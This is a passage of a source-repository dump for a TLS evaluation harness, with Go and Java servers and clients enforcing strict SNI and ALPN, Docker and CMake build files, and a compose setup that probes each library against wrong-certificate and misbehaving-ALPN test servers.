Overriding VerifyConnection") 51 | conf.VerifyConnection = func(cs tls.ConnectionState) error { 52 | if cs.NegotiatedProtocol == "" { 53 | return errors.New("INVALID ALPN") 54 | } else { 55 | log.Println("ALPN:", cs.NegotiatedProtocol) 56 | return nil 57 | } 58 | } 59 | } 60 | 61 | // Connect to host 62 | conn, err := tls.Dial("tcp", host+":"+port, conf) 63 | if err != nil { 64 | log.Println(err) 65 | if strings.Contains(err.Error(), "server selected unadvertised ALPN protocol") { 66 | os.Exit(120) 67 | } else if strings.Contains(err.Error(), "x509: certificate is valid for") { 68 | os.Exit(42) 69 | } 70 | os.Exit(1) 71 | } 72 | 73 | // Send message to server 74 | n, err := conn.Write([]byte("Hello from Client!\n")) 75 | if err != nil { 76 | log.Println(n, err) 77 | os.Exit(2) 78 | return 79 | } 80 | 81 | // Receive message from server 82 | buf := make([]byte, 100) 83 | n, err = conn.Read(buf) 84 | if err != nil { 85 | log.Println(n, err) 86 | os.Exit(3) 87 | return 88 | } 89 | print(string(buf[:n])) 90 | 91 | defer conn.Close() 92 | os.Exit(0) 93 | } 94 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/client/go.mod: -------------------------------------------------------------------------------- 1 | module client 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | golang-server: 8 | image: tls-golang 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | golang-client: 16 | image: tls-golang 17 | 
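 depends_on:
   - golang-server
   - openssl-server-wrong-cn
   - openssl-malicious-alpn
 command: [ "/client.sh", "/client", "golang-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"]
--------------------------------------------------------------------------------
/evaluation-libraries/golang/run.sh:
--------------------------------------------------------------------------------
./build.sh
docker-compose up --abort-on-container-exit --exit-code-from golang-client --remove-orphans
--------------------------------------------------------------------------------
/evaluation-libraries/golang/server/go.mod:
--------------------------------------------------------------------------------
module server

go 1.17
--------------------------------------------------------------------------------
/evaluation-libraries/golang/server/server.go:
--------------------------------------------------------------------------------
package main

import (
	"bufio"
	"crypto/tls"
	"errors"
	"flag"
	"log"
	"net"
	"runtime"
)

// Defaults; all of them can be overridden from the command line (see main).
var servername = "tls-server.com"
var certificate = "certs/tls-server.com-chain.crt"
var privatekey = "certs/tls-server.com.key"
var port = ":4433"
var alpn = []string{"http/1.1"}

// verifyConnection is installed as tls.Config.VerifyConnection. crypto/tls
// calls it after the handshake messages have been processed and aborts the
// handshake when it returns a non-nil error. It implements the two "strict"
// policies of this evaluation server:
//
//   - ALPN: reject when no application protocol was negotiated. The client's
//     offered list is not exposed here, so "client sent no ALPN" and "client
//     sent ALPN with no overlap" both appear as an empty NegotiatedProtocol and
//     are both rejected.
//   - SNI: reject when the client sent a server_name that is not the configured
//     servername. A ClientHello without SNI is still accepted (as before).
//
// The original code only applied the ALPN check on Go < 1.17 (selected by a
// lexical comparison of runtime.Version(), which mis-orders versions such as
// "go1.9") and otherwise relied on the toolchain's built-in ALPN enforcement.
// As far as the standard library documents it, that enforcement only aborts
// when the client offers ALPN with no overlap; a client that sends no ALPN at
// all was therefore accepted on newer Go. Applying the check on every version
// keeps the server strict regardless of toolchain.
func verifyConnection(cs tls.ConnectionState) error {
	if cs.NegotiatedProtocol == "" {
		return errors.New("INVALID ALPN")
	}
	if cs.ServerName != "" && cs.ServerName != servername {
		return errors.New("INVALID SNI: " + cs.ServerName)
	}
	log.Println("ALPN:", cs.NegotiatedProtocol)
	log.Println("SNI:", cs.ServerName)
	return nil
}

// main parses the command line, loads the certificate chain and private key,
// and serves TLS 1.2+ connections on port, handing each accepted connection to
// handleConnection. Errors while loading the key pair or binding the listener
// are logged and terminate the program.
func main() {
	log.SetFlags(log.LstdFlags)

	println("Using GO:" + runtime.Version())

	// Command-line arguments. The flag defaults intentionally point at the
	// container paths under /etc/ssl/cert-data and override the package-level
	// initialisers above.
	flag.StringVar(&servername, "s", "tls-server.com", "servername for SNI")
	flag.StringVar(&alpn[0], "a", "http/1.1", "ALPN")
	flag.StringVar(&certificate, "c", "/etc/ssl/cert-data/tls-server.com-chain.crt", "certifcate")
	flag.StringVar(&privatekey, "k", "/etc/ssl/cert-data/tls-server.com.key", "private key")
	flag.Parse()
	println("Parameters servername=" + servername + " alpn=" + alpn[0] + " cert=" + certificate + " key=" + privatekey)

	// Load certificate and private key
	cer, err := tls.LoadX509KeyPair(certificate, privatekey)
	if err != nil {
		log.Println(err)
		return
	}

	conf := &tls.Config{
		Certificates: []tls.Certificate{cer},
		MinVersion:   tls.VersionTLS12,
		// ServerName is a client-side setting (the SNI a client sends); it has
		// no effect on a listener and is kept only for parity with the
		// original configuration.
		ServerName: servername,
		NextProtos: alpn,
		// Strict SNI/ALPN policy, applied on every Go version (see
		// verifyConnection for why this is no longer gated on runtime.Version).
		VerifyConnection: verifyConnection,
	}

	// Listen for connections
	ln, err := tls.Listen("tcp", port, conf)
	if err != nil {
		log.Println(err)
		return
	}
	defer ln.Close()

	for {
		conn, err := ln.Accept()
		if err != nil {
			log.Println(err)
			continue
		}
		go handleConnection(conn)
	}
}

// handleConnection echoes a fixed greeting for every newline-terminated line
// the client sends, until the client closes or an error occurs. The TLS
// handshake runs lazily on the first Read, so a connection rejected by
// verifyConnection surfaces here as the error of the first ReadString and is
// logged rather than crashing the server.
func handleConnection(conn net.Conn) {
	defer conn.Close()
	r := bufio.NewReader(conn)
	for {
		// Receive message from Client
		msg, err := r.ReadString('\n')
		if err != nil {
			log.Println(err)
			return
		}
		print(msg)

		// Send message to Client
		n, err := conn.Write([]byte("Hello from Server!\n"))
		if err != nil {
			log.Println(n, err)
			return
		}
	}
}
--------------------------------------------------------------------------------
/evaluation-libraries/java/Dockerfile:
--------------------------------------------------------------------------------
# syntax=docker/dockerfile:1
FROM tls-baseimage as tls-java
# NOTE(review): VERSION is never referenced in this file; the same ARG appears in
# the wolfssl Dockerfile, where it selects the library tag. Harmless but misleading.
ARG VERSION=4.8.1-stable
RUN apk add openjdk11-jdk
ADD client /client
ADD server /server
WORKDIR /client/bin
RUN javac -cp ../lib/java-getopt-1.0.14.jar -d . ../src/Client.java
RUN jar cmf ../manifest Client.jar Client.class
WORKDIR /server/bin
RUN javac -cp ../lib/java-getopt-1.0.14.jar -d . ../src/Server.java
RUN jar cmf ../manifest Server.jar Server.class
WORKDIR /
COPY --from=tls-openssl /openssl-client /openssl-client
CMD ["java", "-jar", "/server/bin/Server.jar"]
--------------------------------------------------------------------------------
/evaluation-libraries/java/README.md:
--------------------------------------------------------------------------------
# Java tls example with strict sni and strict alpn

Tested with openjdk11 and openjdk17

uses java-getopt for command-line interface https://directory.fsf.org/wiki/Java-getopt

```bash
./run.sh
```
--------------------------------------------------------------------------------
/evaluation-libraries/java/build.sh:
--------------------------------------------------------------------------------
docker build . 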
-t tls-java -f Dockerfile -------------------------------------------------------------------------------- /evaluation-libraries/java/client/README.md: -------------------------------------------------------------------------------- 1 | https://docs.oracle.com/en/java/javase/16/security/java-secure-socket-extension-jsse-reference-guide.html#GUID-59618539-24AD-431E-84E3-585C4C4BF4E5 -------------------------------------------------------------------------------- /evaluation-libraries/java/client/lib/java-getopt-1.0.14.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/evaluation-libraries/java/client/lib/java-getopt-1.0.14.jar -------------------------------------------------------------------------------- /evaluation-libraries/java/client/manifest: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Client 3 | Class-path: ../lib/java-getopt-1.0.14.jar 4 | -------------------------------------------------------------------------------- /evaluation-libraries/java/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | java-server: 8 | image: tls-java 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | java-client: 16 | image: tls-java 17 | command: [ "/client.sh", "java -Djavax.net.ssl.trustStore=certs/ca.crt -jar /client/bin/Client.jar", "java-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - java-server 20 | - openssl-server-wrong-cn 21 | - 
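 openssl-malicious-alpn
--------------------------------------------------------------------------------
/evaluation-libraries/java/run.sh:
--------------------------------------------------------------------------------
./build.sh
docker-compose up --abort-on-container-exit --exit-code-from java-client --remove-orphans
--------------------------------------------------------------------------------
/evaluation-libraries/java/server/README.md:
--------------------------------------------------------------------------------
https://docs.oracle.com/en/java/javase/16/security/java-secure-socket-extension-jsse-reference-guide.html#GUID-59618539-24AD-431E-84E3-585C4C4BF4E5
--------------------------------------------------------------------------------
/evaluation-libraries/java/server/lib/java-getopt-1.0.14.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/evaluation-libraries/java/server/lib/java-getopt-1.0.14.jar
--------------------------------------------------------------------------------
/evaluation-libraries/java/server/manifest:
--------------------------------------------------------------------------------
Manifest-Version: 1.0
Main-Class: Server
Class-path: ../lib/java-getopt-1.0.14.jar
--------------------------------------------------------------------------------
/evaluation-libraries/java/server/src/Server.java:
--------------------------------------------------------------------------------
import java.io.*;
import java.security.KeyStore;
import java.util.*;
import javax.net.ssl.*;

import gnu.getopt.Getopt;

/**
 * Minimal TLS server used to evaluate "strict" SNI and ALPN handling.
 *
 * For every accepted connection it installs an SNIMatcher for the configured
 * servername and restricts ALPN to the configured protocol, performs the
 * handshake, prints the negotiated ALPN, sends one greeting line and echoes
 * whatever the client sends to stdout. Handshake and socket errors are printed
 * and the server keeps accepting.
 *
 * Options: -a alpn, -s servername, -k keystore (PKCS#12), -p port.
 */
public class Server {
    public static String keyFile = "/etc/ssl/cert-data/tls-server.com.p12";
    // Password of the PKCS#12 test fixture shipped in the base image.
    // NOTE(review): hard-coded credential; acceptable only because this is a
    // throwaway lab container with a generated test CA.
    public static String keyPassword = "123456";
    public static String[] protocols = new String[] { "TLSv1.2", "TLSv1.3" };
    public static String[] alpn = { "http/1.1" };
    public static String servername = "tls-server.com";
    public static int port = 4433;

    public static void main(String[] argv) throws Exception {
        parseArgs(argv);
        System.out.println(
                "Parameters servername=" + servername + " alpn=" + alpn[0] + " key=" + keyFile + " port=" + port);

        SSLContext ctx = createContext();

        // Instead of using SSLServerSocketFactory.getDefault(),
        // get a SSLServerSocketFactory based on the SSLContext
        SSLServerSocketFactory sslssf = ctx.getServerSocketFactory();
        try (SSLServerSocket sslServerSocket = (SSLServerSocket) sslssf.createServerSocket(port)) {
            while (true) {
                // Listen for connections; each one is fully handled (and closed)
                // before the next accept.
                SSLSocket sslSocket = (SSLSocket) sslServerSocket.accept();
                serve(sslSocket);
            }
        }
    }

    /**
     * Parses the command line into the static configuration fields.
     * An unknown option prints the usage line and exits with status 2 instead of
     * starting the server with a half-applied configuration. The usage text now
     * lists the options that actually exist (the original advertised -t and -c,
     * which are not parsed, and was printed through print() with a %s
     * placeholder that was never substituted).
     */
    private static void parseArgs(String[] argv) {
        Getopt g = new Getopt("Server", argv, "a:s:k:p:");
        int opt;
        while ((opt = g.getopt()) != -1) {
            switch (opt) {
                case 'a':
                    alpn[0] = g.getOptarg();
                    break;
                case 's':
                    servername = g.getOptarg();
                    break;
                case 'k':
                    keyFile = g.getOptarg();
                    break;
                case 'p':
                    port = Integer.parseInt(g.getOptarg());
                    break;
                default:
                    System.err.println("Usage: Server [-a alpn] [-s servername] [-k keyfile] [-p port]");
                    System.exit(2);
            }
        }
    }

    /**
     * Builds an SSLContext whose only key material is the PKCS#12 keystore at
     * keyFile. The keystore stream is closed after loading (the original leaked
     * the FileInputStream). The trust managers are left at the JDK default;
     * no client authentication is requested, so they are not exercised here.
     */
    private static SSLContext createContext() throws Exception {
        KeyStore keyKS = KeyStore.getInstance("PKCS12");
        try (InputStream in = new FileInputStream(keyFile)) {
            keyKS.load(in, keyPassword.toCharArray());
        }

        KeyManagerFactory kmf = KeyManagerFactory.getInstance("PKIX");
        kmf.init(keyKS, keyPassword.toCharArray());

        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(kmf.getKeyManagers(), null, null);
        return ctx;
    }

    /**
     * Configures strict SNI/ALPN on one accepted socket, performs the handshake
     * and runs the greeting/echo exchange. The socket is always closed when this
     * method returns, including on the error paths; any IOException (handshake
     * failures, SNI/ALPN rejections, resets) is printed and swallowed so the
     * accept loop in main keeps running.
     */
    private static void serve(SSLSocket accepted) {
        try (SSLSocket sslSocket = accepted) {
            SSLParameters sslp = sslSocket.getSSLParameters();

            // createSNIMatcher takes a regular expression, so the servername is
            // quoted: with the raw string the '.' in "tls-server.com" matched any
            // character and e.g. "tls-serverXcom" would have passed the matcher.
            // As far as the JSSE contract goes the matcher is only consulted when
            // the client actually sends server_name; a ClientHello without SNI
            // is not rejected by it.
            SNIMatcher matcher = SNIHostName.createSNIMatcher(java.util.regex.Pattern.quote(servername));
            Collection<SNIMatcher> matchers = new ArrayList<>(1);
            matchers.add(matcher);
            sslp.setSNIMatchers(matchers);

            // Restrict ALPN to the configured protocol. The JDK aborts the
            // handshake when the client offers ALPN with no overlap; the explicit
            // empty-protocol check below additionally rejects clients that send
            // no ALPN at all, which is what "strict ALPN" in the README implies.
            sslp.setApplicationProtocols(alpn);

            sslSocket.setSSLParameters(sslp);
            sslSocket.setEnabledProtocols(protocols);

            // Do the handshake
            sslSocket.startHandshake();

            String ap = sslSocket.getApplicationProtocol();
            System.out.println("ALPN: \"" + ap + "\"");
            if (ap == null || ap.isEmpty()) {
                // NOTE(review): stricter than the original, which served clients
                // that negotiated no protocol; confirm this matches the intended
                // evaluation semantics.
                System.out.println("INVALID ALPN: no application protocol negotiated");
                return;
            }

            // Send message to client
            PrintWriter out = new PrintWriter(
                    new BufferedWriter(new OutputStreamWriter(sslSocket.getOutputStream())));
            out.println("Hello from Server!");
            out.flush();

            // Get message from client
            BufferedReader in = new BufferedReader(new InputStreamReader(sslSocket.getInputStream()));
            String inputLine;
            while ((inputLine = in.readLine()) != null)
                System.out.println(inputLine);
        } catch (IOException e) {
            // Covers SSLHandshakeException, SSLException and SocketException
            // (the three the original caught) plus any other I/O failure that
            // previously escaped main and killed the server.
            System.out.println(e);
        }
    }
}
--------------------------------------------------------------------------------
/evaluation-libraries/mbedtls/CMakeLists.txt:
--------------------------------------------------------------------------------
cmake_minimum_required(VERSION 3.0.0)
project(alpaca-mbedtls VERSION 0.1.0)

add_subdirectory(client)
add_subdirectory(server)
--------------------------------------------------------------------------------
/evaluation-libraries/mbedtls/Dockerfile: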
-------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-mbedtls 3 | ARG VERSION=2.18 4 | WORKDIR /build 5 | RUN git clone --depth=1 --branch=archive/mbedtls-${VERSION} https://github.com/ARMmbed/mbedtls 6 | WORKDIR /build/mbedtls 7 | RUN git submodule update --init --recursive 8 | RUN cmake -DCMAKE_BUILD_TYPE=Debug . && make install 9 | WORKDIR /build 10 | ADD server /build/server 11 | ADD client /build/client 12 | ADD CMakeLists.txt /build/CMakeLists.txt 13 | RUN cmake . .. && make 14 | RUN mv /build/server/server / 15 | RUN mv /build/client/client / 16 | COPY --from=tls-openssl /openssl-client /openssl-client 17 | WORKDIR / 18 | CMD ["/server"] -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/README.md: -------------------------------------------------------------------------------- 1 | # mbed tls example with strict sni and strict alpn 2 | 3 | Tested with mbedtls 2.18 4 | 5 | based on ssl_client1.c and ssl_server.c from mbedtls 6 | https://github.com/ARMmbed/mbedtls/tree/development/programs/ssl 7 | 8 | ```bash 9 | ./run.sh 10 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=2.18 . 
-t tls-mbedtls -f Dockerfile 2 | -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | 5 | add_library(mbedtls STATIC IMPORTED) 6 | set_target_properties(mbedtls PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedtls.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 9 | ) 10 | add_library(mbedx509 STATIC IMPORTED) 11 | set_target_properties(mbedx509 PROPERTIES 12 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedx509.a" 13 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 14 | ) 15 | add_library(mbedcrypto STATIC IMPORTED) 16 | set_target_properties(mbedcrypto PROPERTIES 17 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/crypto/library/libmbedcrypto.a" 18 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/crypto/include" 19 | ) 20 | 21 | add_executable(client client.c) 22 | target_link_libraries(client mbedx509 mbedtls mbedcrypto) 23 | target_compile_options(client PRIVATE -Wall -Wextra) 24 | -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | mbedtls-server: 8 | image: tls-mbedtls 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | mbedtls-client: 16 | image: tls-mbedtls 17 | command: [ "./client.sh", "/client", "mbedtls-server", 
"openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - mbedtls-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from mbedtls-client --remove-orphans -------------------------------------------------------------------------------- /evaluation-libraries/mbedtls/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | 5 | add_library(mbedtls STATIC IMPORTED) 6 | set_target_properties(mbedtls PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedtls.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 9 | ) 10 | add_library(mbedx509 STATIC IMPORTED) 11 | set_target_properties(mbedx509 PROPERTIES 12 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/library/libmbedx509.a" 13 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/include" 14 | ) 15 | add_library(mbedcrypto STATIC IMPORTED) 16 | set_target_properties(mbedcrypto PROPERTIES 17 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/mbedtls/crypto/library/libmbedcrypto.a" 18 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/mbedtls/crypto/include" 19 | ) 20 | 21 | add_executable(server server.c) 22 | target_link_libraries(server mbedx509 mbedtls mbedcrypto) 23 | target_compile_options(server PRIVATE -Wall -Wextra) 24 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | .vscode 3 | CPackConfig.cmake 4 | CPackSourceConfig.cmake 5 | DartConfiguration.tcl 6 | 
 boringssl2
CMakeLists.txt.user
CMakeCache.txt
CMakeFiles
CMakeScripts
Testing
Makefile
cmake_install.cmake
install_manifest.txt
compile_commands.json
CTestTestfile.cmake
_deps

client/178.crt
--------------------------------------------------------------------------------
/evaluation-libraries/openssl/CMakeLists.txt:
--------------------------------------------------------------------------------
cmake_minimum_required(VERSION 3.0.0)
project(alpaca-boringssl VERSION 0.1.0)

add_subdirectory(client)
add_subdirectory(server)
--------------------------------------------------------------------------------
/evaluation-libraries/openssl/Dockerfile-boringssl:
--------------------------------------------------------------------------------
# syntax=docker/dockerfile:1
FROM tls-baseimage as tls-boringssl
# NOTE(review): VERSION is declared (and build.sh passes VERSION=3945) but the
# active clone below does not use it; the pinned variant is commented out, so
# every build fetches whatever the BoringSSL default branch currently points at
# (the README only says "BoringSSL/master from November 2021"). The evaluation is
# therefore not reproducible and the image trusts upstream tip unconditionally.
# Pin to a specific commit (git clone + git checkout <sha>) before relying on
# these results.
ARG VERSION=3945
RUN git clone --depth=1 https://boringssl.googlesource.com/boringssl
#RUN git clone --depth=1 -b ${VERSION} https://boringssl.googlesource.com/boringssl
WORKDIR /src/boringssl
RUN cmake . && make
# Static libraries and headers are installed system-wide so the CMake projects
# below resolve "ssl"/"crypto" to BoringSSL rather than the base image's OpenSSL.
RUN mv crypto/libcrypto.a /lib/libcrypto.a
RUN mv ssl/libssl.a /lib/libssl.a
RUN mv include/* /usr/include/

WORKDIR /build
ADD server /build/server
ADD client /build/client
ADD CMakeLists.txt /build/CMakeLists.txt
RUN cmake . .. && make
RUN mv /build/server/server /
RUN mv /build/client/client /
# The OpenSSL reference client is used by client.sh for the negative probes.
COPY --from=tls-openssl /openssl-client /openssl-client
WORKDIR /
CMD ["/server"]
--------------------------------------------------------------------------------
/evaluation-libraries/openssl/Dockerfile-openssl:
--------------------------------------------------------------------------------
# syntax=docker/dockerfile:1
FROM tls-baseimage as tls-openssl
# NOTE(review): as with the BoringSSL image, build.sh's --build-arg VERSION=1_1_1
# is a no-op here (ARG and the versioned clone are commented out); the build
# tracks the moving head of the openssl-3.0 branch, not a tagged release.
#ARG VERSION=1_1_1
#RUN git clone --depth=1 -b OpenSSL_${VERSION}-stable https://github.com/openssl/openssl
RUN git clone --depth=1 -b openssl-3.0 https://github.com/openssl/openssl
WORKDIR /src/openssl
RUN ./config no-async
RUN make
RUN make install
RUN cp libcrypto.a /lib/libcrypto.a
RUN cp libssl.a /lib/libssl.a
RUN cp -r -L include/* /usr/include/

WORKDIR /build
ADD server /build/server
ADD client /build/client
ADD CMakeLists.txt /build/CMakeLists.txt
RUN cmake . .. && make
RUN mv /build/server/server /openssl-server
RUN mv /build/client/client /openssl-client
# Build tree and the statically linked copies are removed again; only the two
# binaries (and the `make install` output) remain in the image.
RUN rm -r /build/*
RUN rm -r /usr/include/openssl
RUN rm /lib/libcrypto.a
RUN rm /lib/libssl.a
WORKDIR /
CMD ["/openssl-server"]
--------------------------------------------------------------------------------
/evaluation-libraries/openssl/README.md:
--------------------------------------------------------------------------------
# openssl and boringssl example with strict sni and strict alpn

This library creates containers for openssl and boringssl since they are almost code-compatible. 
4 | 5 | needs tls-baseimage already in docker 6 | 7 | Tested openSSL 1.1.0, 1.1.1, 3.0 and BoringSSL/master from November 2021 8 | 9 | roughly based on https://wiki.openssl.org/index.php/SSL/TLS_Client and https://wiki.openssl.org/index.php/Simple_TLS_Server 10 | 11 | ```bash 12 | ./run.sh 13 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/openssl/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=1_1_1 . -t tls-openssl -f Dockerfile-openssl 2 | docker build --build-arg VERSION=3945 . -t tls-boringssl -f Dockerfile-boringssl 3 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | find_package(OpenSSL REQUIRED) 5 | 6 | add_executable(client client.c) 7 | target_link_libraries(client ${CMAKE_DL_LIBS} ssl crypto pthread dl) 8 | target_compile_options(client PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/openssl/client/client.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | void PrintSSLError(FILE *file, const char *msg, int ssl_err, int ret); 10 | 11 | static void InfoCallback(const SSL *ssl, int type, int value); 12 | 13 | static int error_callback(const char *str, size_t len, void *err); -------------------------------------------------------------------------------- /evaluation-libraries/openssl/docker-compose-boringssl.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | 
internal: true 6 | services: 7 | openssl-server-wrong-cn: 8 | image: tls-openssl 9 | command: 10 | [ 11 | "/openssl-server", 12 | "-k", 13 | "/etc/ssl/cert-data/wrong-cn.com.key", 14 | "-c", 15 | "/etc/ssl/cert-data/wrong-cn.com-chain.crt", 16 | ] 17 | openssl-malicious-alpn: 18 | image: tls-openssl 19 | command: ["/openssl-server", "-m"] 20 | boringssl-server: 21 | image: tls-boringssl 22 | boringssl-client: 23 | image: tls-boringssl 24 | depends_on: 25 | - boringssl-server 26 | - openssl-server-wrong-cn 27 | - openssl-malicious-alpn 28 | command: 29 | [ 30 | "/client.sh", 31 | "/client", 32 | "boringssl-server", 33 | "openssl-server-wrong-cn", 34 | "openssl-malicious-alpn", 35 | "6", 36 | ] 37 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | openssl-server: 8 | image: tls-openssl 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: 12 | [ 13 | "/openssl-server", 14 | "-k", 15 | "/etc/ssl/cert-data/wrong-cn.com.key", 16 | "-c", 17 | "/etc/ssl/cert-data/wrong-cn.com-chain.crt", 18 | ] 19 | openssl-malicious-alpn: 20 | image: tls-openssl 21 | command: ["/openssl-server", "-m"] 22 | openssl-client: 23 | image: tls-openssl 24 | depends_on: 25 | - openssl-server 26 | - openssl-server-wrong-cn 27 | - openssl-malicious-alpn 28 | command: 29 | [ 30 | "/client.sh", 31 | "/openssl-client", 32 | "openssl-server", 33 | "openssl-server-wrong-cn", 34 | "openssl-malicious-alpn", 35 | "1", 36 | ] 37 | -------------------------------------------------------------------------------- /evaluation-libraries/openssl/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --exit-code-from openssl-client --remove-orphans 3 | docker-compose 
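 -f docker-compose-boringssl.yml -p "boringssl" up --exit-code-from boringssl-client --remove-orphans
--------------------------------------------------------------------------------
/evaluation-libraries/openssl/server/CMakeLists.txt:
--------------------------------------------------------------------------------
cmake_minimum_required(VERSION 3.0.0)
project(server VERSION 0.1.0)

find_package(OpenSSL REQUIRED)
add_executable(server server.c)
target_link_libraries(server ${CMAKE_DL_LIBS} ssl crypto pthread dl)
target_compile_options(server PRIVATE -Wall -Wextra)
--------------------------------------------------------------------------------
/evaluation-libraries/openssl/server/server.h:
--------------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include
#include

int create_socket(uint16_t p);

#ifdef OPENSSL_IS_BORINGSSL
static int alpn_cb(SSL *ssl, const uint8_t **out, uint8_t *out_len, const uint8_t *in, unsigned in_len, void *arg);
#else
static int alpn_cb(SSL *ssl, const unsigned char **out, unsigned char *out_len, const unsigned char *in, unsigned int in_len, void *arg);
#endif

static int sni_cb(SSL *s, int *al, void *arg);
--------------------------------------------------------------------------------
/evaluation-libraries/run-everything.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Build every evaluation image, run each library's client/server test and
# collect the per-library /results files into a single ./results file.
#
# Must be started from the evaluation-libraries directory: every path below and
# the ../results target are relative to it.
#
# Deliberately NOT `set -e`: `docker-compose up --exit-code-from` propagates the
# test client's exit status, which is non-zero when a library fails a probe, and
# one failing library must not abort the whole sweep. Error handling is explicit
# instead.
set -uo pipefail

# validate current path
current=$(pwd)
current_base=$(basename "$current")
if [[ "$current_base" != "evaluation-libraries" ]]; then
  echo "Please start from the evaluation-libraries folder" >&2
  exit 1
fi

RED='\033[0;31m '
GREEN='\033[0;32m '
NC='\033[0m' # No Color
# RED/GREEN are currently unused; kept for parity with the original script.

#######################################
# Append one library's results to ../results (we are inside the library dir).
# Globals:
#   NC (read)
# Arguments:
#   $1 - label written before the results (library name)
#   $2 - id of the test-client container, as returned by `docker-compose ps -q`;
#        may be empty when the compose project never started the client.
# Outputs:
#   progress on stdout, problems on stderr
# Returns:
#   0 when the results file was copied, 1 otherwise. A missing container or a
#   failed `docker cp` is recorded in ../results instead of silently producing
#   an empty section, which is what the unchecked original did.
#######################################
collect_results() {
  local label=$1
  local containerid=$2

  # %b expands the escape sequence in NC like the original `echo -e` did.
  printf '%b%s\n' "$NC" "$label" >> ../results

  if [[ -z "$containerid" ]]; then
    echo "No client container found for $label; nothing to collect" >&2
    echo "MISSING: no client container" >> ../results
    return 1
  fi

  echo "Getting results file from container :$containerid"
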